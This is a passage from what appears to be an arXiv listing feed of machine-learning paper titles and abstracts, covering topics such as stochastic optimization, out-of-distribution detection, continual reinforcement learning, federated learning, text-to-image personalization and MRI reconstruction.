    We consider a class of stochastic smooth convex optimization problems under rather general assumptions on the noise in the stochastic gradient observation. As opposed to the classical problem setting in which the variance of noise is assumed to be uniformly bounded, herein we assume that the variance of stochastic gradients is related to the "sub-optimality" of the approximate solutions delivered by the algorithm. Such problems naturally arise in a variety of applications, in particular, in the well-known generalized linear regression problem in statistics. However, to the best of our knowledge, none of the existing stochastic approximation algorithms for solving this class of problems attain optimality in terms of the dependence on accuracy, problem parameters, and mini-batch size. We discuss two non-Euclidean accelerated stochastic approximation routines--stochastic accelerated gradient descent (SAGD) and stochastic gradient extrapolation (SGE)--which carry a particular duality relationship. We show that both SAGD and SGE, under appropriate conditions, achieve the optimal convergence rate, attaining the optimal iteration and sample complexities simultaneously. However, corresponding assumptions for the SGE algorithm are more general; they allow, for instance, for efficient application of the SGE to statistical estimation problems under heavy tail noises and discontinuous score functions. We also discuss the application of the SGE to problems satisfying quadratic growth conditions, and show how it can be used to recover sparse solutions. Finally, we report on some simulation experiments to illustrate numerical performance of our proposed algorithms in high-dimensional settings.
    Multiple Testing Framework for Out-of-Distribution Detection. (arXiv:2206.09522v4 [stat.ML] UPDATED)
    We study the problem of Out-of-Distribution (OOD) detection, that is, detecting whether a learning algorithm's output can be trusted at inference time. While a number of tests for OOD detection have been proposed in prior work, a formal framework for studying this problem is lacking. We propose a definition for the notion of OOD that includes both the input distribution and the learning algorithm, which provides insights for the construction of powerful tests for OOD detection. We propose a multiple hypothesis testing inspired procedure to systematically combine any number of different statistics from the learning algorithm using conformal p-values. We further provide strong guarantees on the probability of incorrectly classifying an in-distribution sample as OOD. In our experiments, we find that threshold-based tests proposed in prior work perform well in specific settings, but not uniformly well across different types of OOD instances. In contrast, our proposed method that combines multiple statistics performs uniformly well across different datasets and neural networks.
    The Effectiveness of World Models for Continual Reinforcement Learning. (arXiv:2211.15944v2 [cs.LG] UPDATED)
    World models power some of the most efficient reinforcement learning algorithms. In this work, we showcase that they can be harnessed for continual learning - a situation when the agent faces changing environments. World models typically employ a replay buffer for training, which can be naturally extended to continual learning. We systematically study how different selective experience replay methods affect performance, forgetting, and transfer. We also provide recommendations regarding various modeling options for using world models. The best set of choices is called Continual-Dreamer, it is task-agnostic and utilizes the world model for continual exploration. Continual-Dreamer is sample efficient and outperforms state-of-the-art task-agnostic continual reinforcement learning methods on Minigrid and Minihack benchmarks.
    Classification and Generation of real-world data with an Associative Memory Model. (arXiv:2207.04827v4 [cs.NE] UPDATED)
    Drawing from memory the face of a friend you have not seen in years is a difficult task. However, if you happen to cross paths, you would easily recognize each other. The biological memory is equipped with an impressive compression algorithm that can store the essential, and then infer the details to match perception. The Willshaw Memory is a simple abstract model for cortical computations which implements mechanisms of biological memories. Using our recently proposed sparse coding prescription for visual patterns, this model can store and retrieve an impressive amount of real-world data in a fault-tolerant manner. In this paper, we extend the capabilities of the basic Associative Memory Model by using a Multiple-Modality framework. In this setting, the memory stores several modalities (e.g., visual, or textual) of each pattern simultaneously. After training, the memory can be used to infer missing modalities when just a subset is perceived. Using a simple encoder-memory-decoder architecture, and a newly proposed iterative retrieval algorithm for the Willshaw Model, we perform experiments on the MNIST dataset. By storing both the images and labels as modalities, a single Memory can be used not only to retrieve and complete patterns but also to classify and generate new ones. We further discuss how this model could be used for other learning tasks, thus serving as a biologically-inspired framework for learning.
    Adapting to Mixing Time in Stochastic Optimization with Markovian Data. (arXiv:2202.04428v3 [cs.LG] UPDATED)
    We consider stochastic optimization problems where data is drawn from a Markov chain. Existing methods for this setting crucially rely on knowing the mixing time of the chain, which in real-world applications is usually unknown. We propose the first optimization method that does not require the knowledge of the mixing time, yet obtains the optimal asymptotic convergence rate when applied to convex problems. We further show that our approach can be extended to: (i) finding stationary points in non-convex optimization with Markovian data, and (ii) obtaining better dependence on the mixing time in temporal difference (TD) learning; in both cases, our method is completely oblivious to the mixing time. Our method relies on a novel combination of multi-level Monte Carlo (MLMC) gradient estimation together with an adaptive learning method.
    The complexity of non-stationary reinforcement learning. (arXiv:2307.06877v1 [cs.LG])
    The problem of continual learning in the domain of reinforcement learning, often called non-stationary reinforcement learning, has been identified as an important challenge to the application of reinforcement learning. We prove a worst-case complexity result, which we believe captures this challenge: Modifying the probabilities or the reward of a single state-action pair in a reinforcement learning problem requires an amount of time almost as large as the number of states in order to keep the value function up to date, unless the strong exponential time hypothesis (SETH) is false; SETH is a widely accepted strengthening of the P $\neq$ NP conjecture. Recall that the number of states in current applications of reinforcement learning is typically astronomical. In contrast, we show that just $\textit{adding}$ a new state-action pair is considerably easier to implement.
    Uncovering Unique Concept Vectors through Latent Space Decomposition. (arXiv:2307.06913v1 [cs.LG])
    Interpreting the inner workings of deep learning models is crucial for establishing trust and ensuring model safety. Concept-based explanations have emerged as a superior approach that is more interpretable than feature attribution estimates such as pixel saliency. However, defining the concepts for the interpretability analysis biases the explanations by the user's expectations on the concepts. To address this, we propose a novel post-hoc unsupervised method that automatically uncovers the concepts learned by deep models during training. By decomposing the latent space of a layer in singular vectors and refining them by unsupervised clustering, we uncover concept vectors aligned with directions of high variance that are relevant to the model prediction, and that point to semantically distinct concepts. Our extensive experiments reveal that the majority of our concepts are readily understandable to humans, exhibit coherency, and bear relevance to the task at hand. Moreover, we showcase the practical utility of our method in dataset exploration, where our concept vectors successfully identify outlier training samples affected by various confounding factors. This novel exploration technique has remarkable versatility to data types and model architectures and it will facilitate the identification of biases and the discovery of sources of error within training data.
    Identifying Early Help Referrals For Local Authorities With Machine Learning And Bias Analysis. (arXiv:2307.06871v1 [cs.LG])
    Local authorities in England, such as Leicestershire County Council (LCC), provide Early Help services that can be offered at any point in a young person's life when they experience difficulties that cannot be supported by universal services alone, such as schools. This paper investigates the utilisation of machine learning (ML) to assist experts in identifying families that may need to be referred for Early Help assessment and support. LCC provided an anonymised dataset comprising 14360 records of young people under the age of 18. The dataset was pre-processed, machine learning models were build, and experiments were conducted to validate and test the performance of the models. Bias mitigation techniques were applied to improve the fairness of these models. During testing, while the models demonstrated the capability to identify young people requiring intervention or early help, they also produced a significant number of false positives, especially when constructed with imbalanced data, incorrectly identifying individuals who most likely did not need an Early Help referral. This paper empirically explores the suitability of data-driven ML models for identifying young people who may require Early Help services and discusses their appropriateness and limitations for this task.
    Weighted Averaged Stochastic Gradient Descent: Asymptotic Normality and Optimality. (arXiv:2307.06915v1 [stat.ML])
    Stochastic Gradient Descent (SGD) is one of the simplest and most popular algorithms in modern statistical and machine learning due to its computational and memory efficiency. Various averaging schemes have been proposed to accelerate the convergence of SGD in different settings. In this paper, we explore a general averaging scheme for SGD. Specifically, we establish the asymptotic normality of a broad range of weighted averaged SGD solutions and provide asymptotically valid online inference approaches. Furthermore, we propose an adaptive averaging scheme that exhibits both optimal statistical rate and favorable non-asymptotic convergence, drawing insights from the optimal weight for the linear model in terms of non-asymptotic mean squared error (MSE).
    Ensemble learning for blending gridded satellite and gauge-measured precipitation data. (arXiv:2307.06840v1 [cs.LG])
    Regression algorithms are regularly used for improving the accuracy of satellite precipitation products. In this context, ground-based measurements are the dependent variable and the satellite data are the predictor variables, together with topography factors. Alongside this, it is increasingly recognised in many fields that combinations of algorithms through ensemble learning can lead to substantial predictive performance improvements. Still, a sufficient number of ensemble learners for improving the accuracy of satellite precipitation products and their large-scale comparison are currently missing from the literature. In this work, we fill this specific gap by proposing 11 new ensemble learners in the field and by extensively comparing them for the entire contiguous United States and for a 15-year period. We use monthly data from the PERSIANN (Precipitation Estimation from Remotely Sensed Information using Artificial Neural Networks) and IMERG (Integrated Multi-satellitE Retrievals for GPM) gridded datasets. We also use gauge-measured precipitation data from the Global Historical Climatology Network monthly database, version 2 (GHCNm). The ensemble learners combine the predictions by six regression algorithms (base learners), namely the multivariate adaptive regression splines (MARS), multivariate adaptive polynomial splines (poly-MARS), random forests (RF), gradient boosting machines (GBM), extreme gradient boosting (XGBoost) and Bayesian regularized neural networks (BRNN), and each of them is based on a different combiner. The combiners include the equal-weight combiner, the median combiner, two best learners and seven variants of a sophisticated stacking method. The latter stacks a regression algorithm on the top of the base learners to combine their independent predictions...
    AnuraSet: A dataset for benchmarking Neotropical anuran calls identification in passive acoustic monitoring. (arXiv:2307.06860v1 [cs.SD])
    Global change is predicted to induce shifts in anuran acoustic behavior, which can be studied through passive acoustic monitoring (PAM). Understanding changes in calling behavior requires the identification of anuran species, which is challenging due to the particular characteristics of neotropical soundscapes. In this paper, we introduce a large-scale multi-species dataset of anuran amphibians calls recorded by PAM, that comprises 27 hours of expert annotations for 42 different species from two Brazilian biomes. We provide open access to the dataset, including the raw recordings, experimental setup code, and a benchmark with a baseline model of the fine-grained categorization problem. Additionally, we highlight the challenges of the dataset to encourage machine learning researchers to solve the problem of anuran call identification towards conservation policy. All our experiments and resources can be found on our GitHub repository https://github.com/soundclim/anuraset.
    Towards Learning to Imitate from a Single Video Demonstration. (arXiv:1901.07186v4 [cs.LG] UPDATED)
    Agents that can learn to imitate given video observation -- \emph{without direct access to state or action information} are more applicable to learning in the natural world. However, formulating a reinforcement learning (RL) agent that facilitates this goal remains a significant challenge. We approach this challenge using contrastive training to learn a reward function comparing an agent's behaviour with a single demonstration. We use a Siamese recurrent neural network architecture to learn rewards in space and time between motion clips while training an RL policy to minimize this distance. Through experimentation, we also find that the inclusion of multi-task data and additional image encoding losses improve the temporal consistency of the learned rewards and, as a result, significantly improves policy learning. We demonstrate our approach on simulated humanoid, dog, and raptor agents in 2D and a quadruped and a humanoid in 3D. We show that our method outperforms current state-of-the-art techniques in these environments and can learn to imitate from a single video demonstration.
    Emergent Neural Network Mechanisms for Generalization to Objects in Novel Orientations. (arXiv:2109.13445v2 [cs.CV] UPDATED)
    The capability of Deep Neural Networks (DNNs) to recognize objects in orientations outside the distribution of the training data is not well understood. We present evidence that DNNs are capable of generalizing to objects in novel orientations by disseminating orientation-invariance obtained from familiar objects seen from many viewpoints. This capability strengthens when training the DNN with an increasing number of familiar objects, but only in orientations that involve 2D rotations of familiar orientations. We show that this dissemination is achieved via neurons tuned to common features between familiar and unfamiliar objects. These results implicate brain-like neural mechanisms for generalization.
    Fast and Functional Structured Data Generators Rooted in Out-of-Equilibrium Physics. (arXiv:2307.06797v1 [cs.LG])
    In this study, we address the challenge of using energy-based models to produce high-quality, label-specific data in complex structured datasets, such as population genetics, RNA or protein sequences data. Traditional training methods encounter difficulties due to inefficient Markov chain Monte Carlo mixing, which affects the diversity of synthetic data and increases generation times. To address these issues, we use a novel training algorithm that exploits non-equilibrium effects. This approach, applied on the Restricted Boltzmann Machine, improves the model's ability to correctly classify samples and generate high-quality synthetic data in only a few sampling steps. The effectiveness of this method is demonstrated by its successful application to four different types of data: handwritten digits, mutations of human genomes classified by continental origin, functionally characterized sequences of an enzyme protein family, and homologous RNA sequences from specific taxonomies.
    TinyMetaFed: Efficient Federated Meta-Learning for TinyML. (arXiv:2307.06822v1 [cs.LG])
    The field of Tiny Machine Learning (TinyML) has made substantial advancements in democratizing machine learning on low-footprint devices, such as microcontrollers. The prevalence of these miniature devices raises the question of whether aggregating their knowledge can benefit TinyML applications. Federated meta-learning is a promising answer to this question, as it addresses the scarcity of labeled data and heterogeneous data distribution across devices in the real world. However, deploying TinyML hardware faces unique resource constraints, making existing methods impractical due to energy, privacy, and communication limitations. We introduce TinyMetaFed, a model-agnostic meta-learning framework suitable for TinyML. TinyMetaFed facilitates collaborative training of a neural network initialization that can be quickly fine-tuned on new devices. It offers communication savings and privacy protection through partial local reconstruction and Top-P% selective communication, computational efficiency via online learning, and robustness to client heterogeneity through few-shot learning. The evaluations on three TinyML use cases demonstrate that TinyMetaFed can significantly reduce energy consumption and communication overhead, accelerate convergence, and stabilize the training process.
    Enhancing Reliability in Federated mmWave Networks: A Practical and Scalable Solution using Radar-Aided Dynamic Blockage Recognition. (arXiv:2307.06834v1 [cs.NI])
    This article introduces a new method to improve the dependability of millimeter-wave (mmWave) and terahertz (THz) network services in dynamic outdoor environments. In these settings, line-of-sight (LoS) connections are easily interrupted by moving obstacles like humans and vehicles. The proposed approach, coined as Radar-aided Dynamic blockage Recognition (RaDaR), leverages radar measurements and federated learning (FL) to train a dual-output neural network (NN) model capable of simultaneously predicting blockage status and time. This enables determining the optimal point for proactive handover (PHO) or beam switching, thereby reducing the latency introduced by 5G new radio procedures and ensuring high quality of experience (QoE). The framework employs radar sensors to monitor and track objects movement, generating range-angle and range-velocity maps that are useful for scene analysis and predictions. Moreover, FL provides additional benefits such as privacy protection, scalability, and knowledge sharing. The framework is assessed using an extensive real-world dataset comprising mmWave channel information and radar data. The evaluation results show that RaDaR substantially enhances network reliability, achieving an average success rate of 94% for PHO compared to existing reactive HO procedures that lack proactive blockage prediction. Additionally, RaDaR maintains a superior QoE by ensuring sustained high throughput levels and minimising PHO latency.
    Provable Multi-Task Representation Learning by Two-Layer ReLU Neural Networks. (arXiv:2307.06887v1 [cs.LG])
    Feature learning, i.e. extracting meaningful representations of data, is quintessential to the practical success of neural networks trained with gradient descent, yet it is notoriously difficult to explain how and why it occurs. Recent theoretical studies have shown that shallow neural networks optimized on a single task with gradient-based methods can learn meaningful features, extending our understanding beyond the neural tangent kernel or random feature regime in which negligible feature learning occurs. But in practice, neural networks are increasingly often trained on {\em many} tasks simultaneously with differing loss functions, and these prior analyses do not generalize to such settings. In the multi-task learning setting, a variety of studies have shown effective feature learning by simple linear models. However, multi-task learning via {\em nonlinear} models, arguably the most common learning paradigm in practice, remains largely mysterious. In this work, we present the first results proving feature learning occurs in a multi-task setting with a nonlinear model. We show that when the tasks are binary classification problems with labels depending on only $r$ directions within the ambient $d\gg r$-dimensional input space, executing a simple gradient-based multitask learning algorithm on a two-layer ReLU neural network learns the ground-truth $r$ directions. In particular, any downstream task on the $r$ ground-truth coordinates can be solved by learning a linear classifier with sample and neuron complexity independent of the ambient dimension $d$, while a random feature model requires exponential complexity in $d$ for such a guarantee.
    Domain-Agnostic Tuning-Encoder for Fast Personalization of Text-To-Image Models. (arXiv:2307.06925v1 [cs.CV])
    Text-to-image (T2I) personalization allows users to guide the creative image generation process by combining their own visual concepts in natural language prompts. Recently, encoder-based techniques have emerged as a new effective approach for T2I personalization, reducing the need for multiple images and long training times. However, most existing encoders are limited to a single-class domain, which hinders their ability to handle diverse concepts. In this work, we propose a domain-agnostic method that does not require any specialized dataset or prior information about the personalized concepts. We introduce a novel contrastive-based regularization technique to maintain high fidelity to the target concept characteristics while keeping the predicted embeddings close to editable regions of the latent space, by pushing the predicted tokens toward their nearest existing CLIP tokens. Our experimental results demonstrate the effectiveness of our approach and show how the learned tokens are more semantic than tokens predicted by unregularized models. This leads to a better representation that achieves state-of-the-art performance while being more flexible than previous methods.
    FDAPT: Federated Domain-adaptive Pre-training for Language Models. (arXiv:2307.06933v1 [cs.LG])
    Combining Domain-adaptive Pre-training (DAPT) with Federated Learning (FL) can enhance model adaptation by leveraging more sensitive and distributed data while preserving data privacy. However, few studies have focused on this method. Therefore, we conduct the first comprehensive empirical study to evaluate the performance of Federated Domain-adaptive Pre-training (FDAPT). We demonstrate that FDAPT can maintain competitive downstream task performance to the centralized baseline in both IID and non-IID situations. Furthermore, we propose a novel algorithm, Frozen Federated Domain-adaptive Pre-training (FFDAPT). FFDAPT improves the computational efficiency by 12.1% on average and exhibits similar downstream task performance to standard FDAPT, with general performance fluctuations remaining less than 1%. Finally, through a critical evaluation of our work, we identify promising future research directions for this new research area.
    CLAIMED -- the open source framework for building coarse-grained operators for accelerated discovery in science. (arXiv:2307.06824v1 [cs.AI])
    In modern data-driven science, reproducibility and reusability are key challenges. Scientists are well skilled in the process from data to publication. Although some publication channels require source code and data to be made accessible, rerunning and verifying experiments is usually hard due to a lack of standards. Therefore, reusing existing scientific data processing code from state-of-the-art research is hard as well. This is why we introduce CLAIMED, which has a proven track record in scientific research for addressing the repeatability and reusability issues in modern data-driven science. CLAIMED is a framework to build reusable operators and scalable scientific workflows by supporting the scientist to draw from previous work by re-composing workflows from existing libraries of coarse-grained scientific operators. Although various implementations exist, CLAIMED is programming language, scientific library, and execution environment agnostic.
    Min-Max Optimization under Delays. (arXiv:2307.06886v1 [cs.LG])
    Delays and asynchrony are inevitable in large-scale machine-learning problems where communication plays a key role. As such, several works have extensively analyzed stochastic optimization with delayed gradients. However, as far as we are aware, no analogous theory is available for min-max optimization, a topic that has gained recent popularity due to applications in adversarial robustness, game theory, and reinforcement learning. Motivated by this gap, we examine the performance of standard min-max optimization algorithms with delayed gradient updates. First, we show (empirically) that even small delays can cause prominent algorithms like Extra-gradient (\texttt{EG}) to diverge on simple instances for which \texttt{EG} guarantees convergence in the absence of delays. Our empirical study thus suggests the need for a careful analysis of delayed versions of min-max optimization algorithms. Accordingly, under suitable technical assumptions, we prove that Gradient Descent-Ascent (\texttt{GDA}) and \texttt{EG} with delayed updates continue to guarantee convergence to saddle points for convex-concave and strongly convex-strongly concave settings. Our complexity bounds reveal, in a transparent manner, the slow-down in convergence caused by delays.
    Privacy-Utility Trade-offs in Neural Networks for Medical Population Graphs: Insights from Differential Privacy and Graph Structure. (arXiv:2307.06760v1 [cs.LG])
    We initiate an empirical investigation into differentially private graph neural networks on population graphs from the medical domain by examining privacy-utility trade-offs at different privacy levels on both real-world and synthetic datasets and performing auditing through membership inference attacks. Our findings highlight the potential and the challenges of this specific DP application area. Moreover, we find evidence that the underlying graph structure constitutes a potential factor for larger performance gaps by showing a correlation between the degree of graph homophily and the accuracy of the trained model.
    Data-driven Nonlinear Parametric Model Order Reduction Framework using Deep Hierarchical Variational Autoencoder. (arXiv:2307.06816v1 [cs.LG])
    A data-driven parametric model order reduction (MOR) method using a deep artificial neural network is proposed. The present network, which is the least-squares hierarchical variational autoencoder (LSH-VAE), is capable of performing nonlinear MOR for the parametric interpolation of a nonlinear dynamic system with a significant number of degrees of freedom. LSH-VAE exploits two major changes to the existing networks: a hierarchical deep structure and a hybrid weighted, probabilistic loss function. The enhancements result in a significantly improved accuracy and stability compared against the conventional nonlinear MOR methods, autoencoder, and variational autoencoder. Upon LSH-VAE, a parametric MOR framework is presented based on the spherically linear interpolation of the latent manifold. The present framework is validated and evaluated on three nonlinear and multiphysics dynamic systems. First, the present framework is evaluated on the fluid-structure interaction benchmark problem to assess its efficiency and accuracy. Then, a highly nonlinear aeroelastic phenomenon, limit cycle oscillation, is analyzed. Finally, the present framework is applied to a three-dimensional fluid flow to demonstrate its capability of efficiently analyzing a significantly large number of degrees of freedom. The performance of LSH-VAE is emphasized by comparing its results against that of the widely used nonlinear MOR methods, convolutional autoencoder, and $\beta$-VAE. The present framework exhibits a significantly enhanced accuracy to the conventional methods while still exhibiting a large speed-up factor.
    PC-Droid: Faster diffusion and improved quality for particle cloud generation. (arXiv:2307.06836v1 [hep-ex])
    Building on the success of PC-JeDi we introduce PC-Droid, a substantially improved diffusion model for the generation of jet particle clouds. By leveraging a new diffusion formulation, studying more recent integration solvers, and training on all jet types simultaneously, we are able to achieve state-of-the-art performance for all types of jets across all evaluation metrics. We study the trade-off between generation speed and quality by comparing two attention based architectures, as well as the potential of consistency distillation to reduce the number of diffusion steps. Both the faster architecture and consistency models demonstrate performance surpassing many competing models, with generation time up to two orders of magnitude faster than PC-JeDi.
    Generalizing Supervised Deep Learning MRI Reconstruction to Multiple and Unseen Contrasts using Meta-Learning Hypernetworks. (arXiv:2307.06771v1 [eess.IV])
    Meta-learning has recently been an emerging data-efficient learning technique for various medical imaging operations and has helped advance contemporary deep learning models. Furthermore, meta-learning enhances the knowledge generalization of the imaging tasks by learning both shared and discriminative weights for various configurations of imaging tasks. However, existing meta-learning models attempt to learn a single set of weight initializations of a neural network that might be restrictive for multimodal data. This work aims to develop a multimodal meta-learning model for image reconstruction, which augments meta-learning with evolutionary capabilities to encompass diverse acquisition settings of multimodal data. Our proposed model called KM-MAML (Kernel Modulation-based Multimodal Meta-Learning), has hypernetworks that evolve to generate mode-specific weights. These weights provide the mode-specific inductive bias for multiple modes by re-calibrating each kernel of the base network for image reconstruction via a low-rank kernel modulation operation. We incorporate gradient-based meta-learning (GBML) in the contextual space to update the weights of the hypernetworks for different modes. The hypernetworks and the reconstruction network in the GBML setting provide discriminative mode-specific features and low-level image features, respectively. Experiments on multi-contrast MRI reconstruction show that our model, (i) exhibits superior reconstruction performance over joint training, other meta-learning methods, and context-specific MRI reconstruction methods, and (ii) better adaptation capabilities with improvement margins of 0.5 dB in PSNR and 0.01 in SSIM. Besides, a representation analysis with U-Net shows that kernel modulation infuses 80% of mode-specific representation changes in the high-resolution layers. Our source code is available at https://github.com/sriprabhar/KM-MAML/.
    Robotic surface exploration with vision and tactile sensing for cracks detection and characterisation. (arXiv:2307.06784v1 [cs.RO])
    This paper presents a novel algorithm for crack localisation and detection based on visual and tactile analysis via fibre-optics. A finger-shaped sensor based on fibre-optics is employed for the data acquisition to collect data for the analysis and the experiments. To detect the possible locations of cracks a camera is used to scan an environment while running an object detection algorithm. Once the crack is detected, a fully-connected graph is created from a skeletonised version of the crack. A minimum spanning tree is then employed for calculating the shortest path to explore the crack which is then used to develop the motion planner for the robotic manipulator. The motion planner divides the crack into multiple nodes which are then explored individually. Then, the manipulator starts the exploration and performs the tactile data classification to confirm if there is indeed a crack in that location or just a false positive from the vision algorithm. If a crack is detected, also the length, width, orientation and number of branches are calculated. This is repeated until all the nodes of the crack are explored. In order to validate the complete algorithm, various experiments are performed: comparison of exploration of cracks through full scan and motion planning algorithm, implementation of frequency-based features for crack classification and geometry analysis using a combination of vision and tactile data. From the results of the experiments, it is shown that the proposed algorithm is able to detect cracks and improve the results obtained from vision to correctly classify cracks and their geometry with minimal cost thanks to the motion planning algorithm.
    Federated Multi-Agent Deep Reinforcement Learning for Dynamic and Flexible 3D Operation of 5G Multi-MAP Networks. (arXiv:2307.06842v1 [cs.NI])
    This paper addresses the efficient management of Mobile Access Points (MAPs), which are Unmanned Aerial Vehicles (UAV), in 5G networks. We propose a two-level hierarchical architecture, which dynamically reconfigures the network while considering Integrated Access-Backhaul (IAB) constraints. The high-layer decision process determines the number of MAPs through consensus, and we develop a joint optimization process to account for co-dependence in network self-management. In the low-layer, MAPs manage their placement using a double-attention based Deep Reinforcement Learning (DRL) model that encourages cooperation without retraining. To improve generalization and reduce complexity, we propose a federated mechanism for training and sharing one placement model for every MAP in the low-layer. Additionally, we jointly optimize the placement and backhaul connectivity of MAPs using a multi-objective reward function, considering the impact of varying MAP placement on wireless backhaul connectivity.
    Self-consistency for open-ended generations. (arXiv:2307.06857v1 [cs.AI])
    In this paper, we present a novel approach for improving the quality and consistency of generated outputs from large-scale pre-trained language models (LLMs). Self-consistency has emerged as an effective approach for prompts with fixed answers, selecting the answer with the highest number of votes. In this paper, we introduce a generalized framework for self-consistency that extends its applicability beyond problems that have fixed-answer answers. Through extensive simulations, we demonstrate that our approach consistently recovers the optimal or near-optimal generation from a set of candidates. We also propose lightweight parameter-free similarity functions that show significant and consistent improvements across code generation, autoformalization, and summarization tasks, even without access to token log probabilities. Our method incurs minimal computational overhead, requiring no auxiliary reranker models or modifications to the existing model.
    Improved selective background Monte Carlo simulation at Belle II with graph attention networks and weighted events. (arXiv:2307.06434v1 [hep-ex])
    When measuring rare processes at Belle II, a huge luminosity is required, which means a large number of simulations are necessary to determine signal efficiencies and background contributions. However, this process demands high computation costs while most of the simulated data, in particular in case of background, are discarded by the event selection. Thus, filters using graph neural networks are introduced at an early stage to save the resources for the detector simulation and reconstruction of events discarded at analysis level. In our work, we improved the performance of the filters using graph attention and investigated statistical methods including sampling and reweighting to deal with the biases introduced by the filtering.  ( 2 min )
    Why Guided Dialog Policy Learning performs well? Understanding the role of adversarial learning and its alternative. (arXiv:2307.06721v1 [cs.CL])
    Dialog policies, which determine a system's action based on the current state at each dialog turn, are crucial to the success of the dialog. In recent years, reinforcement learning (RL) has emerged as a promising option for dialog policy learning (DPL). In RL-based DPL, dialog policies are updated according to rewards. The manual construction of fine-grained rewards, such as state-action-based ones, to effectively guide the dialog policy is challenging in multi-domain task-oriented dialog scenarios with numerous state-action pair combinations. One way to estimate rewards from collected data is to train the reward estimator and dialog policy simultaneously using adversarial learning (AL). Although this method has demonstrated superior performance experimentally, it is fraught with the inherent problems of AL, such as mode collapse. This paper first identifies the role of AL in DPL through detailed analyses of the objective functions of dialog policy and reward estimator. Next, based on these analyses, we propose a method that eliminates AL from reward estimation and DPL while retaining its advantages. We evaluate our method using MultiWOZ, a multi-domain task-oriented dialog corpus.
    Breaking 3-Factor Approximation for Correlation Clustering in Polylogarithmic Rounds. (arXiv:2307.06723v1 [cs.DS])
    In this paper, we study parallel algorithms for the correlation clustering problem, where every pair of two different entities is labeled with similar or dissimilar. The goal is to partition the entities into clusters to minimize the number of disagreements with the labels. Currently, all efficient parallel algorithms have an approximation ratio of at least 3. In comparison with the $1.994+\epsilon$ ratio achieved by polynomial-time sequential algorithms [CLN22], a significant gap exists. We propose the first poly-logarithmic depth parallel algorithm that achieves a better approximation ratio than 3. Specifically, our algorithm computes a $(2.4+\epsilon)$-approximate solution and uses $\tilde{O}(m^{1.5})$ work. Additionally, it can be translated into a $\tilde{O}(m^{1.5})$-time sequential algorithm and a poly-logarithmic rounds sublinear-memory MPC algorithm with $\tilde{O}(m^{1.5})$ total memory. Our approach is inspired by Awerbuch, Khandekar, and Rao's [AKR12] length-constrained multi-commodity flow algorithm, where we develop an efficient parallel algorithm to solve a truncated correlation clustering linear program of Charikar, Guruswami, and Wirth [CGW05]. Then we show the solution of the truncated linear program can be rounded with a factor of at most 2.4 loss by using the framework of [CMSY15]. Such a rounding framework can then be implemented using parallel pivot-based approaches.
    Embodied Lifelong Learning for Task and Motion Planning. (arXiv:2307.06870v1 [cs.RO])
    A robot deployed in a home over long stretches of time faces a true lifelong learning problem. As it seeks to provide assistance to its users, the robot should leverage any accumulated experience to improve its own knowledge to become a more proficient assistant. We formalize this setting with a novel lifelong learning problem formulation in the context of learning for task and motion planning (TAMP). Exploiting the modularity of TAMP systems, we develop a generative mixture model that produces candidate continuous parameters for a planner. Whereas most existing lifelong learning approaches determine a priori how data is shared across task models, our approach learns shared and non-shared models and determines which to use online during planning based on auxiliary tasks that serve as a proxy for each model's understanding of a state. Our method exhibits substantial improvements in planning success on simulated 2D domains and on several problems from the BEHAVIOR benchmark.
    A survey on deep learning approaches for data integration in autonomous driving system. (arXiv:2306.11740v2 [cs.RO] UPDATED)
    The perception module of self-driving vehicles relies on a multi-sensor system to understand its environment. Recent advancements in deep learning have led to the rapid development of approaches that integrate multi-sensory measurements to enhance perception capabilities. This paper surveys the latest deep learning integration techniques applied to the perception module in autonomous driving systems, categorizing integration approaches based on "what, how, and when to integrate". A new taxonomy of integration is proposed, based on three dimensions: multi-view, multi-modality, and multi-frame. The integration operations and their pros and cons are summarized, providing new insights into the properties of an "ideal" data integration approach that can alleviate the limitations of existing methods. After reviewing hundreds of relevant papers, this survey concludes with a discussion of the key features of an optimal data integration approach.
    Vehicle Dispatching and Routing of On-Demand Intercity Ride-Pooling Services: A Multi-Agent Hierarchical Reinforcement Learning Approach. (arXiv:2307.06742v1 [eess.SY])
    The integrated development of city clusters has given rise to an increasing demand for intercity travel. Intercity ride-pooling service exhibits considerable potential in upgrading traditional intercity bus services by implementing demand-responsive enhancements. Nevertheless, its online operations suffer the inherent complexities due to the coupling of vehicle resource allocation among cities and pooled-ride vehicle routing. To tackle these challenges, this study proposes a two-level framework designed to facilitate online fleet management. Specifically, a novel multi-agent feudal reinforcement learning model is proposed at the upper level of the framework to cooperatively assign idle vehicles to different intercity lines, while the lower level updates the routes of vehicles using an adaptive large neighborhood search heuristic. Numerical studies based on the realistic dataset of Xiamen and its surrounding cities in China show that the proposed framework effectively mitigates the supply and demand imbalances, and achieves significant improvement in both the average daily system profit and order fulfillment ratio.
    HyperDreamBooth: HyperNetworks for Fast Personalization of Text-to-Image Models. (arXiv:2307.06949v1 [cs.CV])
    Personalization has emerged as a prominent aspect within the field of generative AI, enabling the synthesis of individuals in diverse contexts and styles, while retaining high-fidelity to their identities. However, the process of personalization presents inherent challenges in terms of time and memory requirements. Fine-tuning each personalized model needs considerable GPU time investment, and storing a personalized model per subject can be demanding in terms of storage capacity. To overcome these challenges, we propose HyperDreamBooth-a hypernetwork capable of efficiently generating a small set of personalized weights from a single image of a person. By composing these weights into the diffusion model, coupled with fast finetuning, HyperDreamBooth can generate a person's face in various contexts and styles, with high subject details while also preserving the model's crucial knowledge of diverse styles and semantic modifications. Our method achieves personalization on faces in roughly 20 seconds, 25x faster than DreamBooth and 125x faster than Textual Inversion, using as few as one reference image, with the same quality and style diversity as DreamBooth. Also our method yields a model that is 10000x smaller than a normal DreamBooth model. Project page: https://hyperdreambooth.github.io
    S-HR-VQVAE: Sequential Hierarchical Residual Learning Vector Quantized Variational Autoencoder for Video Prediction. (arXiv:2307.06701v1 [cs.CV])
    We address the video prediction task by putting forth a novel model that combines (i) our recently proposed hierarchical residual vector quantized variational autoencoder (HR-VQVAE), and (ii) a novel spatiotemporal PixelCNN (ST-PixelCNN). We refer to this approach as a sequential hierarchical residual learning vector quantized variational autoencoder (S-HR-VQVAE). By leveraging the intrinsic capabilities of HR-VQVAE at modeling still images with a parsimonious representation, combined with the ST-PixelCNN's ability at handling spatiotemporal information, S-HR-VQVAE can better deal with chief challenges in video prediction. These include learning spatiotemporal information, handling high dimensional data, combating blurry prediction, and implicit modeling of physical characteristics. Extensive experimental results on the KTH Human Action and Moving-MNIST tasks demonstrate that our model compares favorably against top video prediction techniques both in quantitative and qualitative evaluations despite a much smaller model size. Finally, we boost S-HR-VQVAE by proposing a novel training method to jointly estimate the HR-VQVAE and ST-PixelCNN parameters.
    Unsupervised Calibration through Prior Adaptation for Text Classification using Large Language Models. (arXiv:2307.06713v1 [cs.CL])
